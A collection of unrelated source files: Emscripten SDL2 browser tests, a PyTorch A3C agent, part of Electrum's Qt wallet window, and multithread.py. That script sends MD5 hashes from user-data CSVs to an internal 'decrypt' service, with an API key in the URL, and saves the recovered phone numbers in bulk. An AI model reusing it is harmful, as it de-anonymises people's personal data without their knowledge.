var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?712')
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?572')
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self):
self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_compressed(self):
for image, width in [(path_from_root('tests', 'screenshot2.png'), 300),
(path_from_root('tests', 'screenshot.jpg'), 600)]:
self.clear()
print image
basename = os.path.basename(image)
shutil.copyfile(image, os.path.join(self.get_dir(), basename))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.build_native_lzma()
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html',
'--preload-file', basename, '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')
]).communicate()
shutil.move(os.path.join(self.get_dir(), basename), basename + '.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?' + str(width))
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 1000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
|
A3C.py | import copy
import random
import time
import numpy as np
import torch
from torch import multiprocessing
from torch.multiprocessing import Queue
from torch.optim import Adam
from agents.Base_Agent import Base_Agent
from utilities.Utility_Functions import create_actor_distribution, SharedAdam
class A3C(Base_Agent):
"""Actor critic A3C algorithm from deepmind paper https://arxiv.org/pdf/1602.01783.pdf"""
agent_name = "A3C"
def __init__(self, config, agent_name_=agent_name):
super(A3C, self).__init__(config, agent_name_=agent_name_)
self.num_processes = multiprocessing.cpu_count()
self.worker_processes = max(1, self.num_processes - 2)
self.actor_critic = self.create_NN(input_dim=self.state_size, output_dim=[self.action_size, 1])
self.actor_critic_optimizer = SharedAdam(self.actor_critic.parameters(), lr=self.hyperparameters["learning_rate"], eps=1e-4)
self.wandb_watch(self.actor_critic, log_freq=self.config.wandb_model_log_freq)
def run_n_episodes(self):
"""Runs game to completion n times and then summarises results and saves model (if asked to)"""
start = time.time()
results_queue = Queue()
gradient_updates_queue = Queue()
episode_number = multiprocessing.Value('i', 0)
self.optimizer_lock = multiprocessing.Lock()
episodes_per_process = int(self.config.num_episodes_to_run / self.worker_processes) + 1
processes = []
self.actor_critic.share_memory()
self.actor_critic_optimizer.share_memory()
optimizer_worker = multiprocessing.Process(target=self.update_shared_model, args=(gradient_updates_queue,))
optimizer_worker.start()
for process_num in range(self.worker_processes):
worker = Actor_Critic_Worker(process_num, copy.deepcopy(self.environment), self.actor_critic, episode_number, self.optimizer_lock,
self.actor_critic_optimizer, self.config, episodes_per_process,
self.hyperparameters["epsilon_decay_rate_denominator"],
self.action_size, self.action_types,
results_queue, copy.deepcopy(self.actor_critic), gradient_updates_queue)
worker.start()
processes.append(worker)
self.print_results(episode_number, results_queue)
for worker in processes:
worker.join()
optimizer_worker.kill()
time_taken = time.time() - start
return self.game_full_episode_scores, self.rolling_results, time_taken
def print_results(self, episode_number, results_queue):
"""Worker that prints out results as they get put into a queue"""
while True:
with episode_number.get_lock():
carry_on = episode_number.value < self.config.num_episodes_to_run
if carry_on:
if not results_queue.empty():
self.total_episode_score_so_far = results_queue.get()
self.save_and_print_result()
else: break
def update_shared_model(self, gradient_updates_queue):
"""Worker that updates the shared model with gradients as they get put into the queue"""
while True:
gradients = gradient_updates_queue.get()
with self.optimizer_lock:
self.actor_critic_optimizer.zero_grad()
for grads, params in zip(gradients, self.actor_critic.parameters()):
params._grad = grads # maybe need to do grads.clone()
self.actor_critic_optimizer.step()
class Actor_Critic_Worker(torch.multiprocessing.Process):
"""Actor critic worker that will play the game for the designated number of episodes """
def __init__(self, worker_num, environment, shared_model, counter, optimizer_lock, shared_optimizer,
config, episodes_to_run, epsilon_decay_denominator, action_size, action_types, results_queue,
local_model, gradient_updates_queue):
super(Actor_Critic_Worker, self).__init__()
self.environment = environment
self.config = config
self.worker_num = worker_num
self.gradient_clipping_norm = self.config.hyperparameters["gradient_clipping_norm"]
self.discount_rate = self.config.hyperparameters["discount_rate"]
self.normalise_rewards = self.config.hyperparameters["normalise_rewards"]
self.action_size = action_size
self.set_seeds(self.worker_num)
self.shared_model = shared_model
self.local_model = local_model
self.local_optimizer = Adam(self.local_model.parameters(), lr=0.0, eps=1e-4)
self.counter = counter
self.optimizer_lock = optimizer_lock
self.shared_optimizer = shared_optimizer
self.episodes_to_run = episodes_to_run
self.epsilon_decay_denominator = epsilon_decay_denominator
self.exploration_worker_difference = self.config.hyperparameters["exploration_worker_difference"]
self.action_types = action_types
self.results_queue = results_queue
self.episode_number = 0
self.gradient_updates_queue = gradient_updates_queue
def set_seeds(self, worker_num):
"""Sets random seeds for this worker"""
torch.manual_seed(self.config.seed + worker_num)
self.environment.seed(self.config.seed + worker_num)
def run(self):
"""Starts the worker"""
torch.set_num_threads(1)
for ep_ix in range(self.episodes_to_run):
with self.optimizer_lock:
Base_Agent.copy_model_over(self.shared_model, self.local_model)
epsilon_exploration = self.calculate_new_exploration()
state = self.reset_game_for_worker()
done = False
self.episode_states = []
self.episode_actions = []
self.episode_rewards = []
self.episode_log_action_probabilities = []
self.critic_outputs = []
while not done:
action, action_log_prob, critic_outputs = self.pick_action_and_get_critic_values(self.local_model, state, epsilon_exploration)
next_state, reward, done, _ = self.environment.step(action)
self.episode_states.append(state)
self.episode_actions.append(action)
self.episode_rewards.append(reward)
self.episode_log_action_probabilities.append(action_log_prob)
self.critic_outputs.append(critic_outputs)
state = next_state
total_loss = self.calculate_total_loss()
self.put_gradients_in_queue(total_loss)
self.episode_number += 1
with self.counter.get_lock():
self.counter.value += 1
self.results_queue.put(np.sum(self.episode_rewards))
def calculate_new_exploration(self):
"""Calculates the new exploration parameter epsilon. It picks a random point within 3X above and below the
current epsilon"""
with self.counter.get_lock():
epsilon = 1.0 / (1.0 + (self.counter.value / self.epsilon_decay_denominator))
epsilon = max(0.0, random.uniform(epsilon / self.exploration_worker_difference, epsilon * self.exploration_worker_difference))
return epsilon
def reset_game_for_worker(self):
"""Resets the game environment so it is ready to play a new episode"""
state = self.environment.reset()
if self.action_types == "CONTINUOUS": self.noise.reset()
return state
def pick_action_and_get_critic_values(self, policy, state, epsilon_exploration=None):
"""Picks an action using the policy"""
state = torch.from_numpy(state).float().unsqueeze(0)
model_output = policy.forward(state)
actor_output = model_output[:, list(range(self.action_size))] #we only use first set of columns to decide action, last column is state-value
critic_output = model_output[:, -1]
action_distribution = create_actor_distribution(self.action_types, actor_output, self.action_size)
action = action_distribution.sample().cpu().numpy()
if self.action_types == "CONTINUOUS": action += self.noise.sample()
if self.action_types == "DISCRETE":
if random.random() <= epsilon_exploration:
action = random.randint(0, self.action_size - 1)
else:
action = action[0]
action_log_prob = self.calculate_log_action_probability(action, action_distribution)
return action, action_log_prob, critic_output
def calculate_log_action_probability(self, actions, action_distribution):
"""Calculates the log probability of the chosen action"""
policy_distribution_log_prob = action_distribution.log_prob(torch.Tensor([actions]))
return policy_distribution_log_prob
def calculate_total_loss(self):
"""Calculates the actor loss + critic loss"""
discounted_returns = self.calculate_discounted_returns()
if self.normalise_rewards:
discounted_returns = self.normalise_discounted_returns(discounted_returns)
critic_loss, advantages = self.calculate_critic_loss_and_advantages(discounted_returns)
actor_loss = self.calculate_actor_loss(advantages)
total_loss = actor_loss + critic_loss
return total_loss
def calculate_discounted_returns(self):
"""Calculates the cumulative discounted return for an episode which we will then use in a learning iteration"""
discounted_returns = [0]
for ix in range(len(self.episode_states)):
return_value = self.episode_rewards[-(ix + 1)] + self.discount_rate*discounted_returns[-1]
discounted_returns.append(return_value)
discounted_returns = discounted_returns[1:]
discounted_returns = discounted_returns[::-1]
return discounted_returns
def normalise_discounted_returns(self, discounted_returns):
"""Normalises the discounted returns by dividing by mean and std of returns that episode"""
mean = np.mean(discounted_returns)
std = np.std(discounted_returns)
discounted_returns -= mean
discounted_returns /= (std + 1e-5)
return discounted_returns
def calculate_critic_loss_and_advantages(self, all_discounted_returns):
"""Calculates the critic's loss and the advantages"""
critic_values = torch.cat(self.critic_outputs)
advantages = torch.Tensor(all_discounted_returns) - critic_values
advantages = advantages.detach()
critic_loss = (torch.Tensor(all_discounted_returns) - critic_values)**2
critic_loss = critic_loss.mean()
return critic_loss, advantages
def calculate_actor_loss(self, advantages):
"""Calculates the loss for the actor"""
action_log_probabilities_for_all_episodes = torch.cat(self.episode_log_action_probabilities)
actor_loss = -1.0 * action_log_probabilities_for_all_episodes * advantages
actor_loss = actor_loss.mean()
return actor_loss
def put_gradients_in_queue(self, total_loss):
"""Puts gradients in a queue for the optimisation process to use to update the shared model"""
self.local_optimizer.zero_grad()
total_loss.backward()
torch.nn.utils.clip_grad_norm_(self.local_model.parameters(), self.gradient_clipping_norm)
gradients = [param.grad.clone() for param in self.local_model.parameters()]
self.gradient_updates_queue.put(gradients)
|
multithread.py | import json
import csv
import time
import requests
import queue
import threading
file_root_path = '.'
file_name1 = 'dwa_d_ia_s_user_prod_0716u8.txt.csv'
file_name2 = 'dwa_d_ia_s_user_prod_transcoded.txt.csv'
def time_it(fun):
def inner_fun(*argc, **argv):
st = time.time()
ret = fun(*argc, **argv)
et = time.time()
print(f"{fun} cost {et-st}")
return ret
return inner_fun
def load_data(f1):
ret = []
file = f'{file_root_path}/{f1}'
with open(file, 'r', encoding='utf8') as fh:
csv_reader = csv.reader(fh)
for line in csv_reader:
if not line:
continue
ret.append(line)
return ret
def writer(q, f1):
wh = open(f"{file_root_path}/{f1}_tel.csv", 'w', encoding='utf8', newline='')
csv_writer = csv.writer(wh)
while True:
d = q.get()
if d is None:
break
csv_writer.writerow(d)
wh.close()
def get_one(ep, q):
md5 = ep[0]
url = "http://decrypt.dianhua.cn/decrypt/?apikey=yuloreInner&country=86&uid=yulore&app=decryptTel&ver=1.0&v=1&h=1&tel=%s" % md5
retry = 10
while retry:
try:
resp = requests.get(url)
if resp.status_code == 200:
ret = json.loads(resp.text)['telNum']
ep.append(ret)
if ret:
break
except Exception as e:
print(e)
retry -= 1
q.put(ep)
def main(q, f1):
src_data = load_data(f1)
print("len: %d" % len(src_data))
c = 0
t_list = []
for e in src_data:
c += 1
print(c)
t = threading.Thread(target=get_one,args=(e, q))
t.start()
t_list.append(t)
while len(t_list) >= 10:
time.sleep(1)
t_list = [tt for tt in t_list if tt.is_alive()]
while len(t_list):
time.sleep(1)
t_list = [tt for tt in t_list if tt.is_alive()]
q.put(None)
@time_it
def deal(f1):
q = queue.Queue()
wt = threading.Thread(target=writer, args=(q, f1))
wt.start()
main(q, f1)
wt.join()
print('done')
if __name__ == '__main__':
deal(file_name1)
deal(file_name2) |
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
